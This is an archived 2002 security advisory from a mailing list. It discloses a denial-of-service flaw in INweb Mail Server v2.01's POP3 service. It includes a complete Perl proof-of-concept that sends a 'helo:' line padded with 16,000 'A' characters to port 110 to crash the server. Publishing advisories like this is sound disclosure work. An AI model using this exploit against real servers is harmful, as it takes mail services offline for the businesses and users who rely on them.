lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <8824488462.20021112180253@securityoffice.net>
From: ts at securityoffice.net (Tamer Sahin)
Subject: [SecurityOffice] INweb Mail Server v2.01 Denial of Service Vulnerability

-----BEGIN PGP SIGNED MESSAGE-----
Hash: MD5

- --[ INweb Mail Server v2.01 Denial of Service Vulnerability ]--

- --[ Type

Denial of Service

- --[ Release Date

November 12, 2002

- --[ Product / Vendor

The INweb Mail Server is a standard Internet POP3 and SMTP mail server that
runs flawlessly under Windows 2000 and NT and other windows platforms.
The INweb Mail Server provides  numerous unique features for both small and
large businesses as well as ISP's. This includes many facilities to handle spam
and viruses.

http://www.inwebmail.com

- --[ Summary

Memory corruption vulnerability exists in INweb Mail Server v2.01. The POP3
server included with INweb Mail Server does not properly handle some types
of requests. By submitting a maliciously crafted request to the POP3 server,
an attacker could crash the system, resulting in a denial of service.

- --[ Exploit

An exploit for this vulnerability exists and is available below.

==================== SNIP ====================

#!/usr/bin/perl -w

use IO::Socket;

$host = $ARGV[0];
$port = "110";
$evil = "A" x 16000;

print "INweb Mail Server v2.01 Denial of Service Vulnerability by SecurityOffice\n";
print "Usage: $0 host\n";
print "Connecting...\n";
$socket = IO::Socket::INET->
            new(Proto=>"tcp",
            PeerAddr=>$host,
            PeerPort=>$port)
            || die "Connection failed.\n";

print "Attacking...\n";
print $socket "helo:$evil\n\n";

close($socket);
print "\nConnection closed. Finished.\n\n";

==================== SNIP ====================

- --[ Tested

INweb Mail Server v2.01 / Windows 2000 sp3

- --[ Vulnerable

INweb Mail Server v2.01 / Windows 2000 sp3

- --[ Disclaimer

http://www.securityoffice.net is not responsible for the misuse or illegal use
of any of the information and/or the software listed on this security advisory.

- --[ Author

Tamer Sahin
ts@...urityoffice.net
http://www.securityoffice.net

All our advisories can be viewed at http://www.securityoffice.net/articles/

Please send suggestions, updates, and comments to feedback@...urityoffice.net

(c) 2002 SecurityOffice

This Security Advisory may be reproduced and distributed, provided that this
Security Advisory is not modified in any way and is attributed to SecurityOffice
and provided that such reproduction and distribution is performed for
non-commercial purposes.

Tamer Sahin
http://www.securityoffice.net

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQEVAwUAPdEmMfpL5ibJRTtBAQHr0AgAl03wgPIywIH1yVsPuYVvNWO5gncManUg
F5RleadvCnVwFkRO22cNkC8NubR1UfnUIKgtgzaaflDTtG/dEwvMYKgt1nyqtTcz
kCskFf+0eibL/Eo2H1f9ozRU71wRD42E8U3Vkg/VKaGSlEBmz2UPBCDHYnvrdnjp
hg0daOaJt18/wF759fbHdnhGjIOsDi8TUiNR+i4gb8HrxY3ZGsL/MEZy88xNs3do
Gf2AN8F82FUTpvxtt75E6Ta802sxkeMtGyWwJQz/7D00EVRjTk55ZUXG3U+PC/hX
Uw4l9UWnU+8nnTb8HpdgwMZNfkd/EbHbDLaqB3RCJZVrfcKPOZ4M3g==
=8IA1
-----END PGP SIGNATURE-----




Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ